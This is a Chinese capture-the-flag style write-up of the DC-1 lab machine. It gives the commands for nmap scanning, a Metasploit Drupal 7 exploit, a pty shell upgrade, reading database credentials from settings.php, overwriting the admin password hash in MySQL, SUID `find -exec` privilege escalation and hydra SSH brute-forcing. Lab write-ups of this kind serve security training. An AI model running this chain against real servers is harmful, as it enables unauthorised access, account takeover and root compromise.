首页 > 其他分享 >DC-1靶场渗透

DC-1靶场渗透

时间:2024-09-22 12:23:11浏览次数:3  
标签:发现 www 渗透 DC drupal flag4 靶场 权限 admin

信息收集

寻找靶机真实IP

扫描网段中有哪些主机在线,使用 -sP 参数,不扫描端口,只扫描「存活主机」。

本质上是Ping扫描,能Ping通有回包,就判定主机在线。

namp -sp 192.168.254.0/24

探端口及服务

nmap -A -p- -v 192.168.254.130

-A 综合性扫描  -v 冗余模式

发现开放了22、80、111端口,分别对应的是ssh服务、web服务、rpcbind服务

访问web端口

 

发现是一个电信的drupal服务,根据nmap结果可知当前运行的是Drupal 7的CMS

searchsploit  drupal 7

也可以百度一下drupal漏洞

利用MSF渗透 

 进入MSF控制台

msfconsole

搜索drupal模块

search drupal

利用2018年漏洞测试

使用use进行选择

use 1

执行whoami

发现是www-data权限

进入home目录,发现flag4.txt文件,提示需要提升权限

使用python反弹一个交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

显示了当前路径

查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件

直接搜索drupal的默认配置文件

Drupal的默认配置文件为 /var/www/sites/default/settings.php

查看文件内容 

cat /var/www/sites/default/settings.php

发现了flag2和数据库的账号密码

flag2提示,提升权限为root来查看敏感文件

mysql -u dbuser -p

 查看数据库,切换到drupaldb数据库

'username' => 'dbuser',

'password' => 'R0ck3t'

查看查找默认的Drupal user 表

select * from users;

发现admin信息

解决方法:置换drupal密码

quit;

退出,进入www目录

站点路径下执行

php scripts/password-hash.sh 新密码

然后在进入数据库中把密码字段进行替换
进入mysql,输入密码,切换到drupaldb数据库

mysql -u dbuser -p

R0ck3t

use drupaldb

将pass字段进行替换

update users set pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where name="admin";

两个相同代码一个引号后带空格一个不带

访问站点

进行登录,密码是之前我们自己替换的,账号是admin

admin  123

登陆之后发现flag3 点进去后发现下面有提示信息

quit;

返回站点下执行

find / -perm -4000 2>/dev/null

发现find命令

使用命令测试,发现为root权限

touch 123

ls

find / -name 123 -exec "whoami" \;

cat /etc/passwd

发现最后的flag4

退至root权限下执行

cd /usr/share/john

hydra -l flag4 -P password.lst ssh://192.168.254.130

-l 指定用户名

-P 加载密码字典(自定义)

ssh://ip 指定使用协议和ip地址

SSH连接登录,拿到flag4权限

标签:发现,www,渗透,DC,drupal,flag4,靶场,权限,admin
From: https://blog.csdn.net/2401_84651063/article/details/142418160

相关文章

  • 在 Laravel 项目中使用 SCSS 和 TailwindCSS 代码示例
    在编码领域,人们经常意识到什么有效,什么无效,以及尽管是新事物,但什么可以带来明确的改变。在这个小教程中,我将向您展示将scsstailwindcss一起用于无数web应用程序的最简单的事情。这个强大的组合可以显着增强您的web开发工作流程并创建更易于维护的样式表。所以在开始之前先......
  • 使用 Nextjs Prisma、TailwindCSS 和 Next Auth 进行旅行预订
    旅行预订应用程序使用next.js14、tailwindcss、typescript和prisma进行中的旅行应用程序。允许用户注册、游览浏览、预订和评论提交。对开发过程中的所有贡献开放。入门克隆存储库:gitclonehttps://github.com/saidmounaim/travel-booking.git安装依赖项:npminstall......
  • dc-8
    靶机下载地址:dc-8找到靶机nmap-sV192.168.6.0/24查看端口疑似有注入点开始尝试pythonsqlmap.py-u"http://192.168.6.135/?nid=*"--dbs查库pythonsqlmap.py-u"http://192.168.6.135/?nid=*"-D"d7db"--tables查表pythonsqlmap.py-u""......
  • 常见中间件漏洞靶场(tomcat)
    1.CVE-2017-12615开启环境查看端口查看IP在哥斯拉里生成一个木马访问页面修改文件后缀和文件内容放包拿去连接2.后台弱⼝令部署war包打开环境将前边的1.jsp压缩成1.zip然后改名为1.war访问页面进行上传在拿去连接3.CVE-2020-1938打开环境访问一下来......
  • Autosar Dcm开发-诊断2E或31服务实现pending功能
    文章目录前言Dcm规范功能实现总结前言项目开发过程中,有需求在31服务(Routine)收到请求时,等待应用层反馈执行完后再进行响应。所以pending一段时间,本文介绍该功能的实现。Dcm规范以Routine为例,其服务包含以下返回状态0:E_OK,服务成功执行1:E_NOT_OK,服务执行......
  • 50道渗透测试面试题,全懂绝对是高手
    1. 什么是渗透测试,它与安全评估的主要区别是什么? 渗透测试是一种模拟真实攻击的过程,旨在发现并利用系统中的安全漏洞。它侧重于深入探索系统的脆弱性,并尝试获取未授权访问。相比之下,安全评估更广泛地评估系统的安全性,可能包括合规性检查、策略审查等多个方面,而不一定涉......
  • 适合新手入门的靶场 TryHackMe
    对于不少喜欢网络安全的小伙伴,一直在很焦虑。如何学习网络安全,但由于各类平台和自身硬件等方面的限制。学习起来很吃力,故而本文为搭建分享一款在线靶场环境TryHackMe推荐理由对自身硬件没有太高的要求,有个浏览器就行了。支持THMAttackBox无需安装kali等系统,在浏览器直......
  • 重磅来袭!渗透测试+代码审计实战训练营
    前言PHP代码审计课程升级为渗透测试+代码审计实战训练营。渗透测试分为SRC信息收集、常见漏洞利用绕过深度讲解、Windows、Linu权限提升、权限维持四大模块。PHP代码审计为三个阶段,第一阶段讲解基础,第二阶段实战漏洞靶场原理和过滤绕过源码分析,第三阶段实战挖掘CMS和设备......
  • DC-1通关详解
    一、环境搭建:1、靶机描述DC-1是一个专门建立的脆弱实验室,目的是获得渗透测试领域的经验。它是为初学者设计的挑战,但它到底有多容易取决于你的技能和知识,以及你的学习能力。要成功完成这一挑战,您需要掌握Linux技能,熟悉Linux命令行,并具有基本渗透测试工具的经验,例如可以在Kali......
  • dc-5
    靶机下载:dc-5首先先找到靶机nmap-sV192.168.6.0/24去看一下端口服务联系这个地方存在输入我们可以进行尝试,没有什么效果但是发现这个地方的数字一直会改变再看url怀疑存在文件包含漏洞我们扫一下目录发现footer.php即为刚才页面变化的数值这样我们及确定存在文件......